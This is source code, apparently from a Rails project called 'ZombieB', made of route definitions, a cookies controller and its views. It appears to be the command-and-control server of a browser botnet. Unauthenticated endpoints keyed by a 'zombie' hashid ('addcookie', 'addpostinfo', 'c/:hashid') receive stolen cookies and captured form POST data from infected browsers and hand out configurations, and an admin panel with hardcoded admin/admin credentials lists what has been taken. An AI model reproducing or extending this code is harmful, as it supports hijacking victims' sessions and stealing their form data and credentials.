full/server/ZombieB/config/routes.rb
ZombieB::Application.routes.draw do
  resources :file
  resources :upload
  match 'postinfos/removeall' => 'postinfos#removeall'
  resources :postinfos
  match 'cookies/removeall' => 'cookies#removeall'
  resources :cookies
  resources :ccconfigs
  resources :zombies do
	resources :ccconfigs
	resources :cookies 
	resources :postinfos
  end

  match 'c/:hashid' => 'zombies#conf'
  match 'login/:hashid' => 'zombies#login'
  match 'addcookie/:hashid' => 'cookies#new_fromhash'
  match 'addpostinfo/:hashid' => 'postinfos#new_fromhash'
  match 'upload/:hashid' => 'zombies#upload' 
  match 'extensions' => 'extensions#show' 
  match 'ccconfigs/:id/demo' => 'ccconfigs#demo', :as=>:demo

   root :to => 'zombies#index'

end

full/server/ZombieB/app/controllers/cookies_controller.rb
class CookiesController < ApplicationController
http_basic_authenticate_with :name => "admin", :password => "admin", :except => [:new_fromhash]

  # GET /cookies
  # GET /cookies.json
  def index
    @cookies = Cookie.all

    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @cookies }
    end
  end

  # GET /cookies/1
  # GET /cookies/1.json
  def show
    @cookie = Cookie.find(params[:id])

    respond_to do |format|
      format.html # show.html.erb
      format.json { render json: @cookie }
    end
  end

  def new_fromhash
    @zombie = Zombie.where(:hashid => params[:hashid]).first
	@cookie = @zombie.cookies.create(params[:cookie])
    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @cookie }
    end
  end
  
  # GET /cookies/new
  # GET /cookies/new.json
  def new
	@zombie = Zombie.find(params[:zombie_id])
    @cookie = @zombie.cookie.create(params[:cookie])

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @cookie }
    end
  end

  # GET /cookies/1/edit
  def edit
    @cookie = Cookie.find(params[:id])
  end

  # POST /cookies
  # POST /cookies.json
  def create
    @zombie = Zombie.find(params[:zombie_id])
    @cookie = @zombie.cookie.create(params[:cookie])

    respond_to do |format|
      if @cookie.save
        format.html { redirect_to @zombie, notice: 'Cookie was successfully created.' }
        format.json { render json: @cookie, status: :created, location: @cookie }
      else
        format.html { render action: "new" }
        format.json { render json: @cookie.errors, status: :unprocessable_entity }
      end
    end
  end

 
  # DELETE /cookies/1
  # DELETE /cookies/1.json
  def destroy
    @cookie = Cookie.find(params[:id])
    @cookie.destroy

    respond_to do |format|
      format.html { redirect_to cookies_url }
      format.json { head :no_content }
    end
  end
  
	def removeall
	  Cookie.delete_all
	  flash[:notice] = "You have removed all cookies!"
	  redirect_to zombies_path
	end
	  
end

full/server/ZombieB/app/helpers/cookies_helper.rb
module CookiesHelper
end

full/server/ZombieB/app/views/cookies/_form.html.erb
<%= form_for(@cookie) do |f| %>
  <% if @cookie.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@cookie.errors.count, "error") %> prohibited this cookie from being saved:</h2>

      <ul>
      <% @cookie.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="field">
    <%= f.label :data %><br />
    <%= f.text_field :data %>
  </div>
  <div class="field">
    <%= f.label :zombie %><br />
    <%= f.text_field :zombie %>
  </div>
  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

full/server/ZombieB/app/views/cookies/_form_zombie.html.erb
<%= form_for([@zombie, @zombie.cookie.build]) do |f| %>
  <div class="field">
    <%= f.label :data %><br />
    <%= f.text_field :data %>
  </div>

  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

full/server/ZombieB/app/views/cookies/_index_zombie.html.erb
<h1>Listing cookies</h1>

<table>
  <tr>
    <th>Data</th>
    <th></th>
    <th></th>
    <th></th>
  </tr>

  <% even_odd = 0 
@zombie.cookies.each do |cookie|
even_odd = 1 - even_odd
%>

<tr class="background<%= even_odd %>">
    <td><%= cookie.data %></td>
    <td><%= link_to 'Destroy', cookie, :data => {confirm: 'Are you sure?'}, method: :delete %></td>
  </tr>
<% end %>
</table>
<% if @zombie.cookies.size == 0 %>
<em>No cookies found</em>
<% end %>

<br />

full/server/ZombieB/app/views/cookies/edit.html.erb
<h1>Editing cookie</h1>

<%= render 'form' %>

<%= link_to 'Show', @cookie %> |
<%= link_to 'Back', cookies_path %>

full/server/ZombieB/app/views/cookies/index.html.erb
<h1>Listing cookies</h1>

<table>
  <tr>
    <th>Data</th>
    <th>Zombie</th>
    <th></th>
    <th></th>
    <th></th>
  </tr>

<% @cookies.each do |cookie| %>
  <tr>
    <td><%= cookie.data %></td>
    <td><%= cookie.zombie %></td>
    <td><%= link_to 'Show', cookie %></td>
    <td><%= link_to 'Destroy', cookie, :data => {confirm: 'Are you sure?'}, method: :delete %></td>
  </tr>
<% end %>
</table>

<br />

full/server/ZombieB/app/views/cookies/new.html.erb
<h1>New cookie</h1>

<%= render 'form' %>

<%= link_to 'Back', cookies_path %>

full/server/ZombieB/app/views/cookies/new_fromhash.html.erb
<h1>New cookie</h1>

<%= render 'form' %>

<%= link_to 'Back', cookies_path %>

full/server/ZombieB/app/views/cookies/show.html.erb
<p id="notice"><%= notice %></p>

<p>
  <b>Data:</b>
  <%= @cookie.data %>
</p>

<p>
  <b>Zombie:</b>
  <%= @cookie.zombie %>
</p>

<%= link_to 'Back', cookies_path %>